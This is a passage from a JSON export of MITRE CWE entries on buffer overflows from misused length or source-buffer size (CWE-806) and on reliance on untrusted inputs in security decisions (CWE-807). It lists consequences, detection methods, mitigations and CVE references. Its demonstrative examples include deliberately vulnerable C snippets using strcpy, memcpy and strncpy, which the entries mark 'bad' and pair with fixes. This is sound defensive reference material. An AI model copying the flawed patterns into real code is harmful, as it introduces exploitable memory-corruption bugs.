often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. This can often be used to subvert any other security service."},{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate","Effectiveness_Notes":"Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring manual methods to diagnose the underlying problem."},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that the buffer is as large as specified.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname under the assumption that the maximum length value of hostname is 64 bytes, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"Intro_Text":"In the following example, the source character string is copied to the dest character string using the method strncpy.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(source)-1);...","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(dest)-1);...","xhtml:br":["","","",""]}}],"Body_Text":"However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below."},{"Intro_Text":"In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define LOG_INPUT_SIZE 40int outputFilenameToLog(char *filename, int length) {}","xhtml:br":["","",""],"xhtml:i":"// saves the file name to a log file","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buf[LOG_INPUT_SIZE];strncpy(buf, filename, length);success = saveToLogFile(buf);return success;","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["// buffer with size set to maximum size for input to log file","// copy filename to buffer","// save to log file"]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...strncpy(buf, filename, sizeof(buf)-1);...","xhtml:br":["","",""],"xhtml:i":"// copy filename to buffer"}}],"Body_Text":"However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-1959","Description":"Chain: large length value causes buffer over-read (CWE-126)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1959"},{"Reference":"CVE-2011-1848","Description":"Use of packet length field to make a calculation, then copy into a fixed-size buffer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1848"},{"Reference":"CVE-2011-0105","Description":"Chain: retrieval of length value from an uninitialized memory location","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105"},{"Reference":"CVE-2011-0606","Description":"Crafted length value in document reader leads to buffer overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0606"},{"Reference":"CVE-2011-0651","Description":"SSL server overflow when the sum of multiple length fields exceeds a given value","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0651"},{"Reference":"CVE-2010-4156","Description":"Language interpreter API function doesn\'t validate length argument, leading to information exposure","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4156"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"256"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 6, &#34;Why ACLs Are Important&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-741"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}]}},"806":{"attr":{"@_ID":"806","@_Name":"Buffer Access Using Size of Source Buffer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the size of a source buffer when reading from or writing to a destination buffer, which may cause it to access memory that is outside of the bounds of the buffer.","Extended_Description":"When the size of the destination is smaller than the size of the source, a buffer overflow could occur.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"805","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Resultant"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Examples include the Safe C String Library (SafeStr) by Viega, and the Strsafe.h library from Microsoft. This is not a complete solution, since many buffer overflows are not related to strings."},{"Phase":"Build and Compilation","Description":"Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. This is not necessarily a complete solution, since these canary-based mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application."},{"Phase":"Implementation","Description":"Programmers should adhere to the following rules when allocating and managing their applications memory: Double check that your buffer is as large as you specify. When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. Check buffer boundaries if calling this function in a loop and make sure there is no danger of writing past the allocated space. Truncate all input strings to a reasonable length before passing them to the copy and concatenation functions"},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":["Build and Compilation","Operation"],"Description":"Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, the source character string is copied to the dest character string using the method strncpy.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(source)-1);...","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(dest)-1);...","xhtml:br":["","","",""]}}],"Body_Text":"However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below."},{"Intro_Text":"In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define LOG_INPUT_SIZE 40int outputFilenameToLog(char *filename, int length) {}","xhtml:br":["","",""],"xhtml:i":"// saves the file name to a log file","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buf[LOG_INPUT_SIZE];strncpy(buf, filename, length);success = saveToLogFile(buf);return success;","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["// buffer with size set to maximum size for input to log file","// copy filename to buffer","// save to log file"]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...strncpy(buf, filename, sizeof(buf)-1);...","xhtml:br":["","",""],"xhtml:i":"// copy filename to buffer"}}],"Body_Text":"However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below."}]},"Affected_Resources":{"Affected_Resource":"Memory"},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"807":{"attr":{"@_ID":"807","@_Name":"Reliance on Untrusted Inputs in a Security Decision","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.","Extended_Description":{"xhtml:p":["Developers may assume that inputs such as cookies, environment variables, and hidden form fields cannot be modified. However, an attacker could change these inputs using customized clients or other attacks. This change might not be detected. When security decisions such as authentication and authorization are made based on the values of these inputs, attackers can bypass the security of the software.","Without sufficient encryption, integrity checking, or other mechanism, any input that originates from an outsider cannot be trusted."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Availability","Other"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Varies by Context"],"Note":"Attackers can bypass the security decision to access whatever is being protected. The consequences will depend on the associated functionality, but they can range from granting additional privileges to untrusted users to bypassing important security checks. Ultimately, this weakness may lead to exposure or modification of sensitive data, system crash, or execution of arbitrary code."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-10"},"Method":"Manual Static Analysis","Description":"Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.","Effectiveness":"High","Effectiveness_Notes":"The effectiveness and speed of manual analysis will be reduced if the there is not a centralized security mechanism, and the security logic is widely distributed throughout the software."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-14"},"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store state information and sensitive data on the server side only.","Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions.","If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that you has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328)."]}},{"attr":{"@_Mitigation_ID":"MIT-4.2"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","With a stateless protocol such as HTTP, use a framework that maintains the state for you.","Examples include ASP.NET View State [REF-756] and the OWASP ESAPI Session Management feature [REF-45].","Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and 